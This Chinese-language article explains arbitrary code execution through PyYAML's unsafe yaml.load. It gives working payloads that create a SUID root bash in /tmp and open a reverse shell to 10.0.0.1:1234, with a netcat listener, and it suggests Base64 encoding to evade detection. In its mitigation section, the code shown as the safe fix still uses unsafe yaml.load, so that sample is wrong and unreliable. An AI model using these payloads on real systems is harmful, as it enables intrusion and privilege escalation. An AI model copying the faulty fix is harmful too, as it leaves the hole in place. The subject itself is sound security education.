Python 中的 YAML(YAML 不是標記語言)函式庫已被確定存在允許在特定條件下執行任意命令的漏洞。此漏洞是由於使用 yaml.load 函數而未指定安全性載入程式而引起的。預設情況下,yaml.load 可以執行任意 Python 對象,這為惡意負載創建了攻擊面。
根本風險在於反序列化過程。當 YAML 文件包含惡意負載時,yaml.load 會處理嵌入的指令,可能導致程式碼執行。例如,考慮以下程式碼片段:
import yaml filename = "example.yml" data = open(filename, 'r').read() yaml.load(data) # Unsafe usage
這裡,yaml.load 函數不受限制地解析 example.yml,如果 YAML 內容包含不安全指令,則該函數很容易受到攻擊。典型的漏洞利用負載可以被設計來執行任意系統指令。
import yaml from yaml import Loader, UnsafeLoader # Malicious payload payload = b'!!python/object/new:os.system ["cp `which bash` /tmp/bash;chown root /tmp/bash;chmod u+sx /tmp/bash"]' # Exploitation yaml.load(payload) yaml.load(payload, Loader=Loader) yaml.load(payload, Loader=UnsafeLoader)
每個呼叫都會處理有效負載,從而在 /tmp/bash 中建立特權可執行檔。然後可以使用提升的權限執行該二進位檔案:
/tmp/bash -p
這表明,如果在權限配置錯誤或存在其他弱點的系統上利用該漏洞,則可能會出現權限提升的可能性。
一個特別陰險的用例是利用該漏洞進行反向 shell。這使得攻擊者能夠遠端存取目標電腦。該過程涉及在攻擊者的電腦上啟動偵聽器並製作旨在建立反向連接的 YAML 文件。
在攻擊者的機器上,啟動 Netcat 監聽器:
nc -lvnp 1234
在目標系統上,以 root 身分執行以下 Python 腳本:
import yaml # Reverse shell payload data = '!!python/object/new:os.system ["bash -c \"bash -i >& /dev/tcp/10.0.0.1/1234 0>&1\""]' yaml.load(data) # Executes the reverse shell
此有效負載指示目標電腦連接回攻擊者的偵聽器,提供具有執行程序權限的完全互動式 shell。
要繞過基本的安全控製或過濾器,有效負載可以進行 Base64 編碼。此方法增加了一層混淆,可能會逃避靜態分析工具的偵測。
from base64 import b64decode import yaml # Base64-encoded payload encoded_payload = b"ISFweXRa...YXNoIl0=" # Truncated for brevity payload = b64decode(encoded_payload) # Execute the payload yaml.load(payload)
專業人員必須採用嚴格的編碼實務來消除此類漏洞。建議的緩解措施包括:
使用安全性載入器:將 yaml.load 替換為 yaml.safe_load,這樣可以防止執行任意物件。
import yaml filename = "example.yml" data = open(filename, 'r').read() yaml.load(data) # Unsafe usage
限制輸入來源:確保 YAML 輸入經過淨化並且僅來自可信來源。
應用靜態分析:使用工具掃描程式碼庫是否有不安全的 yaml.load 呼叫。
環境強化:限制系統權限以最大程度地減少利用的影響。例如,使用容器化環境限制了攻擊者提升權限的能力。
YAML 函式庫的預設行為體現了與 Python 等動態類型語言中的反序列化相關的風險。利用此漏洞所需的複雜程度極低,因此它成為安全應用程式開發的高優先級問題。採用安全的編碼實踐以及強大的輸入驗證和運行時保護措施對於有效減輕這些風險至關重要。
以上是在 Python 中使用 YAML 時要小心!可能存在安全漏洞的詳細內容。更多資訊請關注PHP中文網其他相關文章!
